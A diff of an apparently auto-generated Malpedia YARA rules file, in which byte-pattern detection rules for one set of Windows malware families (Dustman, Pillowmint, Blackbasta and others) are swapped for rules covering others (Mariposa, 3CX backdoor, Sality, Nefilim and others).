+		$sequence_9 = { 838e90000000ff 8dbe8c000000 85c0 740a 50 ff15???????? }
 
 	condition:
-		7 of them and filesize < 425984
+		7 of them and filesize < 188416
 }
-rule MALPEDIA_Win_Dustman_Auto : FILE
+rule MALPEDIA_Win_Mariposa_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "371d6ab3-949b-5c9d-8033-67b6c55ea566"
+		id = "2a3a2192-1985-5afb-a3c8-457f3f4c729c"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.dustman"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.dustman_auto.yar#L1-L122"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mariposa"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.mariposa_auto.yar#L1-L118"
 		license_url = "N/A"
-		logic_hash = "b063597b5a4ae400c5fb648bc847f945a242473e9377f95d15455828ca13e94a"
+		logic_hash = "343ac33f57cd9cc9bfc1841bf1bd211734de245f417ee554220587a46ed4086f"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -143419,32 +143265,32 @@ rule MALPEDIA_Win_Dustman_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8bd9 4c8d0dedb20000 b902000000 4c8d05d9b20000 }
-		$sequence_1 = { 884810 488b4d88 0fb60c01 884811 488b4d90 0fb60c01 884812 }
-		$sequence_2 = { c3 488d055d954101 c3 488d054d954101 c3 }
-		$sequence_3 = { 4c8d9db1010000 4903cb 48894d88 488bca 492bca }
-		$sequence_4 = { 4d8be1 498be8 4c8bea 4b8b8cfe40c80100 4c8b15???????? 4883cfff }
-		$sequence_5 = { 492bca 4c8d9dc4010000 4903cb 48894d20 488bca 492bca 4c8d9dc5010000 }
-		$sequence_6 = { c4c173590cc1 4c8d0d05750000 c5f359c1 c5fb101d???????? c5fb102d???????? c4e2f1a91d???????? c4e2f1a92d???????? }
-		$sequence_7 = { 0fb68525020000 48c1e028 4c0bd0 0fb68526020000 48c1e030 4c0bd0 0fb68527020000 }
-		$sequence_8 = { e8???????? 4883f8ff 7524 ff15???????? 488d4c2420 }
-		$sequence_9 = { e9???????? 4d8bb4f6d0320100 33d2 498bce 41b800080000 }
+		$sequence_0 = { 55 8bec 53 56 bb???????? 43 }
+		$sequence_1 = { ffd3 33c0 50 e8???????? 33c0 }
+		$sequence_2 = { 53 56 bb???????? 43 }
+		$sequence_3 = { 885c0cff e2f1 ba???????? 2bd6 8bdc 03da 4b }
+		$sequence_4 = { 8a1c0e 02d8 32dc fec0 885c0cff e2f1 }
+		$sequence_5 = { 8bdc 03da 4b 54 ffd3 33c0 }
+		$sequence_6 = { 885c0cff e2f1 ba???????? 2bd6 }
+		$sequence_7 = { 8a4301 8a6302 f6d0 02c4 d0f8 8a1c0e }
+		$sequence_8 = { 53 56 bb???????? 43 803b00 }
+		$sequence_9 = { 03da 4b 54 ffd3 33c0 }
 
 	condition:
-		7 of them and filesize < 368640
+		7 of them and filesize < 311296
 }
-rule MALPEDIA_Win_Pillowmint_Auto : FILE
+rule MALPEDIA_Win_3Cx_Backdoor_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "3853669a-e086-5b11-9aa7-48869422e9e3"
+		id = "c8c4fb8e-665a-53b6-8b3e-37d64668f35c"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.pillowmint"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.pillowmint_auto.yar#L1-L133"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.3cx_backdoor"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.3cx_backdoor_auto.yar#L1-L125"
 		license_url = "N/A"
-		logic_hash = "4bf5c67c89e02047a57c78ccb54899d23f365f779797116ee014480492b0b534"
+		logic_hash = "1c7c6f3ffb80a119e6e9a09aa255f11daa8a6a0cadae64c0d2cee6a1f6aea1e9"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -143458,34 +143304,34 @@ rule MALPEDIA_Win_Pillowmint_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 48c7442460feffffff 48895808 48897018 48897820 488b05???????? 4833c4 488985d0000000 }
-		$sequence_1 = { 488b8c24a0000000 e8???????? 48c78424b80000000f000000 4889bc24b0000000 c68424a000000000 4883bc24d800000010 720d }
-		$sequence_2 = { 7534 8b461c 0fb713 498d0c01 4181f8b80a4c53 7509 448b3491 }
-		$sequence_3 = { e8???????? 488b4608 488d3d68fb2200 488b80f8000000 488bdf bd10000000 c605????????00 }
-		$sequence_4 = { 488d4c2468 e8???????? 90 4c8d05360f0300 488bd0 488d8c24c0000000 e8???????? }
-		$sequence_5 = { 498bc5 482bc1 483bc2 7305 488bd7 eb03 4803d1 }
-		$sequence_6 = { 0fbe00 8d0480 8d80effeffff 8d0442 83f81e 0f8730010000 }
-		$sequence_7 = { e8???????? 8985c0000000 488d95c0000000 e8???????? 4885c0 0f853e040000 488b05???????? }
-		$sequence_8 = { 90 4c8d051c170300 488bd0 488d4dd8 e8???????? 90 4983c9ff }
-		$sequence_9 = { 4883c708 48833b00 75a9 418b4620 4983c614 85c0 0f8579ffffff }
+		$sequence_0 = { 4c8d442420 488d4d98 e8???????? 488bf8 488d542478 498bce e8???????? }
+		$sequence_1 = { 488b4d8f 4c8d05b77c0300 41b920000000 c744242000000000 488d15c27c0300 ff15???????? }
+		$sequence_2 = { 41b8ffffffff 488bd6 ff15???????? ba25000000 8d4a1b }
+		$sequence_3 = { 0f87ff010000 c1e60a 81c60024a0fc 03f0 eb11 8d860024ffff }
+		$sequence_4 = { 488bd7 498bcd e8???????? 498bc4 4c8d5c2450 498b5b40 }
+		$sequence_5 = { 488d0547ac0100 4a8b04f8 42f644e83801 7515 e8???????? c70009000000 e8???????? }
+		$sequence_6 = { 7424 488b4308 44386019 7515 6690 483b5810 750d }
+		$sequence_7 = { 488bc8 e8???????? 4889751f 4889752f 48897537 }
+		$sequence_8 = { e8???????? 85c0 0f85cd100000 e9???????? 4c8d050bae0000 ebdb 4c8d05faad0000 }
+		$sequence_9 = { 83b96804000002 0f8406020000 bd20000000 4c8d35e1510100 488b4310 }
 
 	condition:
-		7 of them and filesize < 4667392
+		7 of them and filesize < 585728
 }
-rule MALPEDIA_Win_Loup_Auto : FILE
+rule MALPEDIA_Win_Sality_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "1404f79d-5679-58f8-95e7-ea2d681e99b9"
+		id = "491e3727-8d5f-59a5-be7f-6df769a7e7b0"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.loup"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.loup_auto.yar#L1-L119"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sality"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.sality_auto.yar#L1-L222"
 		license_url = "N/A"
-		logic_hash = "01fac51b45c233a343e6af089564cab69dab8dfa8648336955517c666022b803"
+		logic_hash = "69c1f81399935d5f7c9bd23257cd0c140ba6f95de6444c6618514cda674397de"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -143497,32 +143343,46 @@ rule MALPEDIA_Win_Loup_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8b4508 50 8d8de0fbffff 51 8d95f0fdffff 52 }
-		$sequence_1 = { 668945e8 33c0 668945ea c745ee01000000 b804000000 }
-		$sequence_2 = { 8d15341a4100 e8???????? 58 5a 5f 5e }
-		$sequence_3 = { 33c5 8945fc b9???????? e8???????? c745c000000000 c745b400000000 }
-		$sequence_4 = { c784055cffffff01000000 8d855cffffff 8945d5 8bf4 6a03 }
-		$sequence_5 = { 7709 8b048514824100 5d c3 33c0 }
-		$sequence_6 = { c705????????01000000 b904000000 6bd100 c78264a1410002000000 b804000000 6bc800 }
-		$sequence_7 = { a1???????? 8985c4fbffff 8b0d???????? 898dc8fbffff 8b15???????? }
-		$sequence_8 = { 668945e8 33c0 668945ea c745ee01000000 }
-		$sequence_9 = { 51 e8???????? 85c0 7513 8b45f4 50 e8???????? }
+		$sequence_0 = { 81f201a00000 668955f8 eb0b 668b45f8 66d1e8 668945f8 }
+		$sequence_1 = { 6a67 e8???????? 83c410 8b4dfc 03c8 894dfc }
+		$sequence_2 = { 51 ff15???????? e9???????? 68581b0000 }
+		$sequence_3 = { 51 ff15???????? eb14 8d95f0fdffff }
+		$sequence_4 = { 81ec88010000 57 c78578feffff00000000 c685fcfeffff00 b940000000 33c0 8dbdfdfeffff }
+		$sequence_5 = { 6a66 e8???????? 83c410 8b55fc 03d0 8955fc eb37 }
+		$sequence_6 = { 0f8447010000 d1ea 7307 4e }
+		$sequence_7 = { 51 ff15???????? e8???????? 25ffff0000 }
+		$sequence_8 = { 7513 8bc2 83e804 8b00 8906 }
+		$sequence_9 = { 8920 896804 8d9dba114000 895808 }
+		$sequence_10 = { 035c240c 33c0 8b3b 037c240c 8b742410 }
+		$sequence_11 = { 8bf2 8bf8 50 ff95c5144000 8bc8 f3a6 61 }
+		$sequence_12 = { 52 ff953a144000 e8???????? 8907 }
+		$sequence_13 = { 646789260000 8b74240c 66813e4d5a 0f858c000000 03763c 813e50450000 }
+		$sequence_14 = { 8b7c2410 b996000000 32c0 f2ae 8bcf }
+		$sequence_15 = { 59 83c304 40 3b4218 75e2 3b4218 }
+		$sequence_16 = { 010d???????? 83c004 5f 5e }
+		$sequence_17 = { 00fb fb 804880bc 280d???????? }
+		$sequence_18 = { 0306 50 8b4e04 8d5608 }
+		$sequence_19 = { 0306 50 8d5604 e8???????? }
+		$sequence_20 = { 0007 7307 c607ff 8ac1 }
+		$sequence_21 = { 014304 c3 53 56 }
+		$sequence_22 = { 0202 7466 0fb77202 8b7a04 }
+		$sequence_23 = { 031e ff7608 ff7604 e8???????? }
 
 	condition:
-		7 of them and filesize < 257024
+		7 of them and filesize < 1523712
 }
-rule MALPEDIA_Win_Unidentified_121_Auto : FILE
+rule MALPEDIA_Win_Ironwind_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "a6510632-1b9e-5c84-ab89-5f72cc6f435a"
+		id = "8b99e462-a945-5218-9501-2580c05d4989"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_121"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.unidentified_121_auto.yar#L1-L169"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ironwind"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.ironwind_auto.yar#L1-L131"
 		license_url = "N/A"
-		logic_hash = "2f8db882acb1a5c7d66a4cbcd4a58ef4e003ccebde890da1f9103b205ffea6c7"
+		logic_hash = "29c70d85a1620a72f758c4af21c3937f3b52ad156ab8f42df1f1abd2148e1f61"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -143536,38 +143396,32 @@ rule MALPEDIA_Win_Unidentified_121_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8b55fc 8b421c 2540040000 750c }
-		$sequence_1 = { 8b55fc 8b4218 8945f0 8b4d08 83792800 7405 }
-		$sequence_2 = { 8b55fc 8b421c 50 68???????? 8b4d08 }
-		$sequence_3 = { ff15???????? 4c8d4c2438 488b0d???????? 41b804000000 488d1584810100 89c3 e8???????? }
-		$sequence_4 = { 0f8499000000 41b806000000 ba01000000 b902000000 ffd5 488b5320 }
-		$sequence_5 = { 8b55fc 8b421c 2580000000 740c }
-		$sequence_6 = { 4889d9 48c744245800000000 48c744246000000000 e8???????? 4889d9 ff15???????? }
-		$sequence_7 = { 8944244c 0f85a1000000 83430801 4d89e1 4989e8 }
-		$sequence_8 = { 3c54 0f857e000000 e8???????? 4d85ed ba01000000 752f }
-		$sequence_9 = { 8b55fc 8b4218 99 8bc8 }
-		$sequence_10 = { 85db 0f8589000000 488b5028 4883ea01 4883fafd 777b 4885ed }
-		$sequence_11 = { 7511 8b7004 85f6 7539 488907 48c70300000000 }
-		$sequence_12 = { e8???????? 41f6c404 488b8600010000 4889ae28010000 0f84b7000000 488d5001 483dff000000 }
-		$sequence_13 = { 8b55fc 8b421c 2580020000 8b4df8 }
-		$sequence_14 = { 8b55fc 8b421c 0d80020000 8b4dfc }
-		$sequence_15 = { 8b55fc 8b421c 0d00080000 8b4dfc 89411c e9???????? }
+		$sequence_0 = { 488bd3 488bc8 ff15???????? 83f801 0f850b010000 4c3bfb 751e }
+		$sequence_1 = { 0f848b000000 488b4dc8 ff15???????? 488b55e8 488d0d988e0400 e8???????? 488945c8 }
+		$sequence_2 = { e9???????? f60603 0f95c0 88878a050000 488b4f18 }
+		$sequence_3 = { 7425 418bc8 488d15f9db0200 90 410fb60409 48ffc1 3a440aff }
+		$sequence_4 = { 83fa01 752d 488d0d109c0600 e8???????? 488bc8 ff15???????? }
+		$sequence_5 = { 0f84aa030000 b001 88476c 48c70700000000 41807c246c00 743d 488bce }
+		$sequence_6 = { 4c896b18 33ff 0fb6ac2490000000 418b87b4060000 488b4b10 448bc0 483bc8 }
+		$sequence_7 = { 4c8d4e38 8bca 4533c0 e8???????? 85c0 0f89c9000000 48c74638ffffffff }
+		$sequence_8 = { 4c896c2438 4c897c2430 e8???????? 4c8be8 4885c0 0f84e0020000 488bd0 }
+		$sequence_9 = { 807f5100 740e 80bc248000000000 0f846a020000 488b4f28 4885c9 743d }
 
 	condition:
-		7 of them and filesize < 2419712
+		7 of them and filesize < 995328
 }
-rule MALPEDIA_Win_Blackbasta_Auto : FILE
+rule MALPEDIA_Win_Webbytea_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "5bbce9ec-7d54-5002-bc1c-a1c1392e7297"
+		id = "af3cfaf5-47ae-5df3-b1d3-9a9fcbf06c59"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.blackbasta"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.blackbasta_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.webbytea"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.webbytea_auto.yar#L1-L110"
 		license_url = "N/A"
-		logic_hash = "f2cab8177edfb4bc6b2c56a6c1db15098f849335780d0e48121fe5285763e5dd"
+		logic_hash = "f1288f1b53f639ade5d87a2ce49a70d5b29a0fbdd563d1f0066de9197507a949"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -143581,32 +143435,32 @@ rule MALPEDIA_Win_Blackbasta_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 7447 8d45d8 84d2 7402 8bc3 fe0430 eb33 }
-		$sequence_1 = { c745e4e48c0a10 8b4508 8bcf 8b7510 c745e004000000 dd00 8b450c }
-		$sequence_2 = { 42 895594 e9???????? 8b45ec c645fc0d 83f810 0f8293000000 }
-		$sequence_3 = { 52 8d5594 52 8b01 ff503c 50 8d8decfeffff }
-		$sequence_4 = { 83c404 807d6700 c645fc26 0f8481040000 8d45c4 33ff 50 }
-		$sequence_5 = { 83c404 8bce 50 e8???????? 83e3ef 895df0 c645fc0c }
-		$sequence_6 = { 8b4904 8b01 5d ff6048 2b49fc 83e970 e9???????? }
-		$sequence_7 = { 6af6 ff15???????? 8b049d58cc0c10 8b4dfc 897c0118 33c0 5f }
-		$sequence_8 = { e9???????? 397d34 7768 ffb564ffffff 8d4d0c e8???????? 8b4d8c }
-		$sequence_9 = { e8???????? 03c6 13d7 8b75e4 3bd6 7f7a 8b4dec }
+		$sequence_0 = { 8901 488d542430 488b4c2420 ff15???????? }
+		$sequence_1 = { 8901 488d542430 488b4c2420 ff15???????? 85c0 }
+		$sequence_2 = { ff15???????? 85c0 7422 41b904000000 }
+		$sequence_3 = { ff15???????? 85c0 7444 41b904000000 }
+		$sequence_4 = { c68424f000000043 c68424f100000072 c68424f200000065 c68424f300000061 c68424f400000074 }
+		$sequence_5 = { ffc0 488b8c2488020000 8901 488d542430 488b4c2420 ff15???????? 85c0 }
+		$sequence_6 = { 4803c8 488bc1 48c744243000000000 c744242800000000 }
+		$sequence_7 = { c68424f100000072 c68424f200000065 c68424f300000061 c68424f400000074 c68424f500000065 }
+		$sequence_8 = { 8b00 ffc0 488b8c2488020000 8901 }
+		$sequence_9 = { c68424f100000072 c68424f200000065 c68424f300000061 c68424f400000074 }
 
 	condition:
-		7 of them and filesize < 1758208
+		7 of them and filesize < 552960
 }
-rule MALPEDIA_Win_Cryptomix_Auto : FILE
+rule MALPEDIA_Win_Nefilim_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "66a42334-0f35-544f-b73c-0df7b8e22035"
+		id = "f770afff-845f-5499-a82e-ad8c0e6c9614"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptomix"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.cryptomix_auto.yar#L1-L177"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.nefilim"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.nefilim_auto.yar#L1-L124"
 		license_url = "N/A"
-		logic_hash = "02f656068f4f76c12e869f1af5a2e63ec8e44cb4db7dffbbf055e2899960d03b"
+		logic_hash = "84fb3ca9c75650a6b701073468d1bedd054df919eaf8258d3aea8d2bb0356db2"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -143620,38 +143474,32 @@ rule MALPEDIA_Win_Cryptomix_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 68???????? ffd0 683e8d61be 6a06 }
-		$sequence_1 = { ffb580efffff ff15???????? 56 68???????? ff15???????? 68???????? 68???????? }
-		$sequence_2 = { 85c0 0f87e0000000 68???????? 56 e8???????? 59 59 }
-		$sequence_3 = { 8be5 5d c3 3dc0ede0b7 }
-		$sequence_4 = { ffb5e0fbffff ff15???????? ff85e8fbffff 8d85e4fbffff 50 68???????? }
-		$sequence_5 = { 59 ff742408 ff742408 ffd0 c3 68c142487b 6a01 }
-		$sequence_6 = { 8b30 57 8b7dfc 68dee70218 6a05 e8???????? }
-		$sequence_7 = { 68???????? 8d85e8fbffff 50 ffd7 8d85c4f9ffff 50 8d85e8fbffff }
-		$sequence_8 = { 8bf9 e8???????? 83c40c 8d85e0fbffff 50 8d85f4fdffff 50 }
-		$sequence_9 = { c785e4fbffff04010000 ff15???????? 8d85e4fbffff 50 56 }
-		$sequence_10 = { 7571 b801000000 8b4dfc 33cd e8???????? 8be5 }
-		$sequence_11 = { 55 8bec 83ec10 57 33ff 6822ded78a }
-		$sequence_12 = { 6802f1f808 6a01 e8???????? 83c430 56 6880000000 }
-		$sequence_13 = { 33c0 8d95f4fdffff 6685c9 0f8465010000 0fb7c9 c1c007 }
-		$sequence_14 = { ff75f4 6a40 e8???????? 8bd8 }
-		$sequence_15 = { 59 8d4dfc 51 683f020f00 56 bb???????? 53 }
+		$sequence_0 = { 6a00 ff15???????? 50 ff15???????? 57 8bf0 }
+		$sequence_1 = { 7304 8d442414 68???????? 50 ffd6 85c0 0f84dc000000 }
+		$sequence_2 = { 50 ffd6 85c0 0f849b040000 68???????? 8d8424d0000000 }
+		$sequence_3 = { 0f8f5d010000 8b4c2418 394c2428 0f822dffffff e9???????? }
+		$sequence_4 = { 3b5d0c 72b3 5e 8b8538ffffff 6a10 2bf8 }
+		$sequence_5 = { 33c0 50 50 ff74241c ffd7 53 8d442434 }
+		$sequence_6 = { 8bf0 ffd3 50 57 e8???????? }
+		$sequence_7 = { 68???????? 50 ffd6 85c0 0f84a0000000 8b442414 397c2428 }
+		$sequence_8 = { 8b4de0 a3???????? 7303 8d4de0 }
+		$sequence_9 = { c9 c3 55 8bec 83e4f8 81ecec020000 a1???????? }
 
 	condition:
-		7 of them and filesize < 188416
+		7 of them and filesize < 142336
 }
-rule MALPEDIA_Win_Kerrdown_Auto : FILE
+rule MALPEDIA_Win_Ketrum_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "da236d92-1fe9-5457-946f-9d7f9613f9af"
+		id = "1ff13c8d-0527-5a40-b6b9-bb4141259de3"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.kerrdown"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.kerrdown_auto.yar#L1-L117"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ketrum"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.ketrum_auto.yar#L1-L171"
 		license_url = "N/A"
-		logic_hash = "2d8b506b753eb11d1ef360ccc2cec767f65cb094a11e4e8ce42bcebdfc177559"
+		logic_hash = "2f5239fe4e1f5d031309de047f066345a22c976ad71c9c05f830bcb3f0899bfb"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -143665,32 +143513,38 @@ rule MALPEDIA_Win_Kerrdown_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 85f6 743f 83ff10 b8???????? 0f43c1 85f6 }
-		$sequence_1 = { 8d45f8 50 68004a0000 68???????? }
-		$sequence_2 = { 741b 56 68???????? 50 e8???????? }
-		$sequence_3 = { 75b2 83ff10 8935???????? b8???????? 0f43c1 5e }
-		$sequence_4 = { 5f 85c0 7543 50 6880000000 }
-		$sequence_5 = { 8bd3 2bd6 8a0e 8d7601 }
-		$sequence_6 = { 8935???????? b8???????? 0f43c1 5e }
-		$sequence_7 = { 884de5 02c2 33f6 8845e6 0fb64435e4 50 }
-		$sequence_8 = { b8???????? 0f43c1 03c2 3d???????? 762a ff750c 83ff10 }
-		$sequence_9 = { 80e203 c0e004 02d1 8855e4 8a55ea 8aca }
+		$sequence_0 = { 8a08 40 3acb 75f9 52 ff74241c 2bc7 }
+		$sequence_1 = { 6a00 50 e8???????? 8d85fcefffff 83c418 }
+		$sequence_2 = { 8bf7 83e61f c1e606 033485a0bc6200 c745e401000000 }
+		$sequence_3 = { 68???????? 50 ffd7 83c43c 53 53 }
+		$sequence_4 = { 85c0 7549 ff15???????? 8bf0 56 68???????? }
+		$sequence_5 = { ba???????? 898df0d3ffff 3bc7 7321 8995f0d3ffff }
+		$sequence_6 = { 894dd4 8945d8 eb06 215dd4 215dd8 }
+		$sequence_7 = { 58 b9???????? e8???????? 59 57 68???????? e8???????? }
+		$sequence_8 = { 68???????? 50 ff15???????? ffb534fdffff 8d8de0fdffff ffb52cfdffff e8???????? }
+		$sequence_9 = { 68???????? 8d4da8 e8???????? 59 84c0 }
+		$sequence_10 = { e8???????? 8b450c 8b5d08 33c9 }
+		$sequence_11 = { ff15???????? 898350010000 80bd33efffff00 0f84e3f2ffff }
+		$sequence_12 = { 7503 6a09 59 66890e eb03 668916 830002 }
+		$sequence_13 = { 898d34efffff 6a00 ffb534efffff 83c8ff }
+		$sequence_14 = { 50 8db578fdffff e8???????? 8bc6 50 8d85a0fbffff 50 }
+		$sequence_15 = { 8d458c 50 c645fc03 e8???????? 59 }
 
 	condition:
-		7 of them and filesize < 278528
+		7 of them and filesize < 4599808
 }
-rule MALPEDIA_Win_Radrat_Auto : FILE
+rule MALPEDIA_Win_Unidentified_044_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "8cc3544a-ed32-5550-b925-dec2c9f06198"
+		id = "34c20231-5d6b-58d1-a551-535378ccd58f"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.radrat"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.radrat_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_044"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.unidentified_044_auto.yar#L1-L119"
 		license_url = "N/A"
-		logic_hash = "fb8c6f115f4d653cbab2ab642c199fa84b318ba0571f54841296153652a76219"
+		logic_hash = "73cc874ec97680c4006726eab010d16567bb76aa0c2f93b41df5ce3208d81ea0"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -143704,34 +143558,34 @@ rule MALPEDIA_Win_Radrat_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { c645fc06 8d9578ffffff 52 83ec28 8bc4 89a520ffffff 8d4dcc }
-		$sequence_1 = { 8b55d8 894a54 837df010 7404 0cff eb7b 8b45d8 }
-		$sequence_2 = { 8d8db4c3ffff e8???????? e9???????? 83bd54ffffff46 0f8570110000 6a01 8d953cc3ffff }
-		$sequence_3 = { e8???????? c3 8d8d8ccdffff e8???????? c3 8d8dac95ffff e8???????? }
-		$sequence_4 = { e8???????? c3 8d4d80 e8???????? c3 8d8d18fdffff e8???????? }
-		$sequence_5 = { e8???????? c745c000000000 eb09 8b45c0 83c001 8945c0 8b4dc0 }
-		$sequence_6 = { c745fc00000000 8b45c0 50 8b4dc8 e8???????? c745fcffffffff 8d4dcc }
-		$sequence_7 = { c68522ffffff00 c68524ffffff00 c645fc07 8b550c 52 8d8decfeffff e8???????? }
-		$sequence_8 = { e8???????? 83c410 8845fc 8b4dfc 81e1ff000000 85c9 7411 }
-		$sequence_9 = { e8???????? c645fc08 8b8d6cfbffff 83c108 e8???????? c645fc04 8d8ddefdffff }
+		$sequence_0 = { ffd6 a1???????? 85c0 75e2 5e c3 a1???????? }
+		$sequence_1 = { 660bfb 66897c0102 8b4c2410 49 894c2410 85c9 }
+		$sequence_2 = { 8d8570feffff 50 6802020000 891d???????? }
+		$sequence_3 = { 83f801 0f85fd000000 8b542418 8d4c2424 }
+		$sequence_4 = { 803d????????00 5f 740d 8b0d???????? 51 }
+		$sequence_5 = { 8b442414 52 50 55 83c8ff }
+		$sequence_6 = { a3???????? 7e0d 6a00 68???????? ff15???????? }
+		$sequence_7 = { 50 ffd7 85c0 7544 8b2d???????? 8b1d???????? 90 }
+		$sequence_8 = { 66c1c208 50 6689542426 ff15???????? 8bf8 83ffff }
+		$sequence_9 = { 55 e8???????? 83c40c 84c0 74a0 8a442413 }
 
 	condition:
-		7 of them and filesize < 2080768
+		7 of them and filesize < 90112
 }
-rule MALPEDIA_Win_Soraya_Auto : FILE
+rule MALPEDIA_Win_Byeby_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "a07d2ec9-21c3-51d7-8a6a-aaea120dc635"
+		id = "0ebfb487-5cbf-53be-adad-b7561bd94d85"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.soraya"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.soraya_auto.yar#L1-L232"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.byeby"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.byeby_auto.yar#L1-L128"
 		license_url = "N/A"
-		logic_hash = "67d5293b43a7462b9bb676c8134e4e8a6a8c166af85a6bac43befacfaf313c24"
+		logic_hash = "14e04fc099db6b56de85356d95024648b8f691b46ad7013820136f566a988b61"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -143743,45 +143597,32 @@ rule MALPEDIA_Win_Soraya_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ff15???????? 8d48bf 80f919 77f2 }
-		$sequence_1 = { 488d4dd0 488bd0 488bd8 ff15???????? 458bc7 33d2 }
